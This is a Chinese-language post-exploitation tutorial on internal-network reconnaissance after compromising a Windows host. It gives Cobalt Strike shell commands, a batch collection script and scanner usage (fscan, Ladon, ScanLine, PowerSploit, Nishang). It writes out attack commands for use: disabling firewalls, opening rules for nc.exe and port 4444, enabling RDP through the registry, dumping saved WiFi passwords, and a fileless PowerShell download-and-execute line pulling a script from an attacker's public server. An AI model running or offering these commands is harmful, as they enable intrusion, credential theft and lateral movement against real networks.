内网信息收集:手动、脚本和工具查IP、端口

1.手动查IP和端口

2.工具查IP

3.工具查端口

我们在内网中拿下目标机器后，需要进行一系列的信息收集，以下为总结的收集方法

1.手动信息收集：

以下命令在CS执行时命令前须加shell,如：shell ipconfig

1.收集IP网卡： ipconfig

2.收集操作系统和软件信息: systeminfo

3.查看操作系统的体系结构：echo %PROCESSOR_ARCHITECTURE%

4.查看目录和文件夹：shell dir shell type 文件名

5.查看操作系统的软件及版本信息：

powershell "Get‐WmiObject ‐class win32_product | Select‐Object ‐Property name,version"

6.本机的服务信息： wmic service list brief

7.查看进程信息： wmic process list brief/tasklist

8.查看启动程序信息: wmic startup get command,caption

9.计划任务信息：schtasks /query /fo LIST /v

10.查看主机开机信息：shell net statistics workstation

11.查看用户列表：shell user/wmic useraccount get name ,SID

12.查看会话：net session

13.查看端口：netstat -ano

14.查看补丁信息：systeminfo 或者

 wmic qfe get Caption,Description,HotFixID,InstalledOn

15.查看共享列表：netshare / wmic share get name,path,status（可能横向移动）

16.路由信息： route print

防火墙相关操作：

1.查看防火墙是否开启： netsh firewall show state

2.关闭防火墙：  

Windows server 2003:     netsh firewall set opmode disable

Windows server 2003之后:  netsh firewall set opmode disable 或者netsh advfirewall set allprofiles state off

3.查看防火墙配置： netsh firewall show config

4.修改防火墙：

2003之前版本,允许指定程序进行全部连接：

netsh firewall add allowedprogram c:\nc.exe "allownc" enable 

2003之后版本，允许指定程序连接：

 netsh advfirewall firewall add rule name="pass nc" dir=in action=allow program="C:\nc.exe"

允许指定程序退出：

 netsh advfirewall firewall add rule name="Allownc" dir=out action=allow program="C: \nc.exe"

允许3389端口放行：

 netsh advfirewall firewall add rule name="RemoteDesktop" protocol=TCP dir=in localport=3389 action=allow

允许4444端口进站：

 netsh advfirewall firewall add rule name=test dir=in action=allow protocol=tcp localport=4444

允许4444端口出站：

 netsh advfirewall firewall add rule name=test dir=out action=allow protocol=tcp localport=4444

允许a.exe进站：

shell netsh advfirewall firewall add rule name=test dir=in action=allow program=c:\a.exe

允许a.exe出站：

shell netsh advfirewall firewall add rule name=test dir=out action=allow 

program=c:\a.exe

开启远程服务：

1.2003机器：

wmic path win32_terminalservicesetting where (_CLASS !="") call setallowtsconnections 1

2.在server2008和server 2021:

开启：REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 00000000 /f

关闭：

REG ADD "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 11111111 /f

WIFI密码收集：

 for /f  "skip=9 tokens=1,2 delims=:" %i in ('netsh wlan show profiles')  do  @echo %j | findstr ‐i ‐v echo |  netsh wlan show profiles %j key=clear

查询RDP端口：

 reg query "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Winstations\RDP‐Tcp" /V PortNumber

注意： oxd3d为3389端口

查看代理信息：

 reg query "HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings"

查看登录凭证：

shell cmdkey /l

ARP信息： arp-a

最近打开的文档：

 dir %APPDATA%\Microsoft\Windows\Recent

查询本机用户组： net localgroup

管理员组成员列表：net localgroup administrators

RDP凭证：net localgroup administrators

杀毒软件查询： wmic /node:localhost /namespace:\\root\securitycenter2 path antivirusproduct get displayname /format:list

命令太多记不全，在目标机器创建一个bat脚本执行：

for /f "delims=" %%A in ('dir /s /b %WINDIR%\system32\*htable.xsl') do set 
"var=%%A"
wmic process get CSName,Description,ExecutablePath,ProcessId /format:"%var%" >> 
out.html
wmic service get Caption,Name,PathName,ServiceType,Started,StartMode,StartName 
/format:"%var%" >> out.html
wmic USERACCOUNT list full /format:"%var%" >> out.html
wmic group list full /format:"%var%" >> out.html
wmic nicconfig where IPEnabled='true' get 
Caption,DefaultIPGateway,Description,DHCPEnabled,DHCPServer,IPAddress,IPSubnet,M
ACAddress /format:"%var%" >> out.html
wmic volume get Label,DeviceID,DriveLetter,FileSystem,Capacity,FreeSpace 
/format:"%var%" >> out.html
wmic netuse list full /format:"%var%" >> out.html
wmic qfe get Caption,Description,HotFixID,InstalledOn /format:"%var%" >> 
out.html
wmic startup get Caption,Command,Location,User /format:"%var%" >> out.html
wmic PRODUCT get 
Description,InstallDate,InstallLocation,PackageCache,Vendor,Version 
/format:"%var%" >> out.html
wmic os get 
name,version,InstallDate,LastBootUpTime,LocalDateTime,Manufacturer,RegisteredUse
r,ServicePackMajorVersion,SystemDirectory /format:"%var%" >> out.html
wmic Timezone get DaylightName,Description,StandardName /format:"%var%" >> 
out.html

输出一个out.html网址，打开即为收集的信息，

也可以自己编写，这是一个简单的示例，可以将上面自己需要的命令写上去，导入到1.txt文件，执行以后查看即可：

2.工具查IP：

1.NetBIOS

这是一款用于扫描Windows网络上NetBIOS名字信息的程序。该程序对给出范围内的每一个地址发 送NetBIOS状态查询，并且以易读的表格列出接收到的信息，对于每个响应的主机，NBTScan列出 它的IP地址、NetBIOS计算机名、登录用户名和MAC地址。但只能用于局域网,NBTSCAN可以取到 PC的真实IP地址和MAC地址，如果有”ARP攻击”在做怪，可以找到装有ARP攻击的PC的IP/和 MAC地址。但只能用于局域网 

nbtscan扫描：nbtscan.exe IP 

2.ICMP

除了利用NetBIOS探测内网，还可以利用ICMP协议探测内网。依次对内网中的每个IP地址执行ping 命令，可以快速找出内网中所有存活酌主机。在渗透测试中中，可以使用如下命令循环探测整个C段

直接用就行：for /L %I in (1,1,254) DO @ping -w 1 -n 1 192.168.1.%I | findstr "TTL="

3.ARP

使用arp协议进行IP探测，这个需要下载脚本

直接用：arp.exe -t IP/24

4.Kscan kscan

是一款资产]测绘工具，可针对指定资产进行端口扫描以及TCP指纹识别和Banner抓取，在不 发送更多的数据包的情况下尽可能的获取端口更多信息。并能够针对扫描结果进行自动化暴力破解， 且是go平台首款开源的RDP暴力破解工具 

下载地址：https://github.com/lcvvvv/kscan

利用：kscanw64.exe -t IP/24 --encoding gb2312(不乱码)

探测网段：kscanw64.exe --spy

其实Kscan还有很多用法，这里只是进行IP扫描，其他用法不再赘述，可以参考：

Kscan-简单的资产测绘工具_kscan使用方法-CSDN博客

5.fscan

一款内网综合扫描工具，方便一键自动化、全方位漏扫扫描。支持主机存活探测、端口扫描、常见服 务的爆破、ms17010、redis批量写公钥、计划任务反弹shell、读取win网卡信息、web指纹识别、 web漏洞扫描、netbios探测、域控识别等功能。

下载地址 https://github.com/lcvvvv/kscan

fscan扫描：fscan64.exe -h IP/24      它也有很多用法，参考以下：

fscan工具的使用_fscan使用-CSDN博客

6. Ladon

一款用于大型网络渗透的多线程插件化综合扫描神器，含端口扫描、服务识别、网络资产、密 码爆破、高危漏洞检测以及一键GetShell，支持批量A段/B段/C段以及跨网段扫描，支持URL、主 机、域名列表扫描。7.5版本内置100个功能模块,外部模块18个,通过多种协议以及方法快速获取目标 网络存活主机IP、计算机名、工作组、共享资源、网卡地址、操作系统版本、网站、子域名、中间 件、开放服务、路由器、数据库等信息，漏洞检测包含MS17010、SMBGhost、Weblogic、 ActiveMQ、Tomcat、Struts2系列等，密码爆破13种含数据库(Mysql、Oracle、MSSQL)、FTP、 SSH、VNC、Windows(LDAP、SMB/IPC、NBT、WMI、SmbHash、WmiHash、Winrm)、 BasicAuth、Tomcat、Weblogic、Rar等，远程执行命令包含(wmiexe/psexec/atexec/sshexec /jspshell),Web指纹识别模块可识别75种（Web应用、中间件、脚本类型、页面类型）等，可高度 自定义插件POC支持.NET程序集、DLL(C#/Delphi/VC)、PowerShell等语言编写的插件,支持通过配 置INI批量调用任意外部程序或命令，EXP生成器可一键生成漏洞POC快速扩展扫描能力。Ladon支 持Cobalt Strike插件化扫描快速拓展内网进行横向移动。

利用：Lodan.exe IP/24 icmp    

使用参考：Ladon使用_ladon使用教程-CSDN博客

3.工具查端口

1.ScanLine

是一款windows下的端口扫描的命令行程序。它可以完成PING扫描、TCP端口扫描、UDP端口扫描等功 能。运行速度很快，不需要winPcap库支持，应用场合受限较少。

利用：

scanline.exe ‐bhpt 21‐23,25,80,110,135‐139,143,443,445,1433,1521,3306,3389,5556,5631,5900,8080  100.100.0.3

scanline.exe ‐bhpt 80,443 100.100.0.1‐254(IP)

scanline.exe ‐bhpt 139,445  IP

其他用法：

‐？         ‐ 显示此帮助文本

‐b          ‐ 获取端口横幅

‐c          ‐ TCP 和 UDP 尝试超时（毫秒）。 默认值为 4000

‐d          ‐ 扫描之间的延迟（毫秒）。 默认为 0

‐f          ‐ 从文件中读取 IP。 使用“stdin”作为标准输入

‐g          ‐ 绑定到给定的本地端口

‐h          ‐ 隐藏没有开放端口的系统的结果

‐i          ‐ 除了 Echo 请求之外，用于 ping 使用 ICMP 时间戳请求

‐j          ‐ 不要在 IP 之间输出“‐‐‐‐‐...”分隔符

‐l          ‐ 从文件中读取 TCP 端口

‐L          ‐ 从文件中读取 UDP 端口

‐m          ‐ 绑定到给定的本地接口 IP

‐n          ‐ 不扫描端口 ‐ 仅 ping（除非您使用 ‐p）

‐o          ‐ 输出文件（覆盖）

‐O          ‐ 输出文件（追加）

‐p          ‐ 扫描前不要 ping 主机

‐q          ‐ ping 超时（毫秒）。 默认值为 2000

‐r          ‐ 将 IP 地址解析为主机名

‐s          ‐ 以逗号分隔格式输出 (csv)

‐t          ‐ 要扫描的 TCP 端口（以逗号分隔的端口/范围列表） ‐T          ‐ 使用 TCP 端口的内部列表

‐u          ‐ 要扫描的 UDP 端口（以逗号分隔的端口/范围列表）

‐U          ‐ 使用 UDP 端口的内部列表

‐v          ‐ 详细模式

‐z          ‐ 随机化 IP 和端口扫描顺序 

2.PowerSpioit PowerSploit

是一款基于PowerShell的后渗透框架软件，包含了很多PowerShell的攻击脚本，它们主要用于渗透中 的信息侦测，权限提升、权限维持等

下载地址： https://github.com/PowerShellMafia/PowerSploit

用法：

ActivirusBypass：发现杀毒软件的查杀特征     

CodeExecution：在目标主机上执行代码     

Exfiltration：目标主机上的信息搜集工具     

Mayhem：蓝屏等破坏性的脚本     

Persistence：后门脚本     

Privsec：提权等脚本     

Recon：以目标主机为跳板进行内网信息侦查     

ScriptModification：在目标主机上创建或修改脚本

本地执行（放到目标服务器）：

shell powershell ‐exec bypass Import‐Module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

远程执行（不需要放到目标服务器，放到公网服务器，无文件加载）：

powershell ‐exec bypass ‐c IEX (New‐Object 

System.Net.Webclient).DownloadString('IP:PORT/Invoke‐Portscan.ps1');import‐module .\Invoke‐Portscan.ps1;Invoke‐Portscan ‐Hosts 192.168.41.0/24 ‐T 4 ‐ports '445,8080,3389,80' ‐oA c:\1.txt

3.Nishang Nishang

是一款针对PowerShell的渗透工具。说到渗透工具，那自然便是老外开发的东西。国人开发的东西，也不 是不行，只不过不被认可罢了。不管是谁开发的，既然跟渗透有关系，那自然是对我们有帮助的，学习就好。来源 什么的都不重要。总之，nishang也是一款不可多得的好工具。非常的好用。

下载地址 https://github.com/samratashok/nishang

利用：

CS上传，只能传ZIP，不能传文件

解压：shell unzip nishang.zip

使用方法：

允许导入：shell powershell Set‐ExecutionPolicy remotesigned   

扫描：

shell powershell ‐command "& { import‐module .\nishang\nishang.psm1; Invoke‐PortScan ‐StartAddress 192.168.11.1 ‐EndAddress 192.168.11.255 -Ports 445 ‐ResolveHost }"

另一种方式：先将nishang导入到CS目录里面：

导入模块：powershell -import .\nishang\nishang.psm1 (不需要再上传服务器)

扫描同上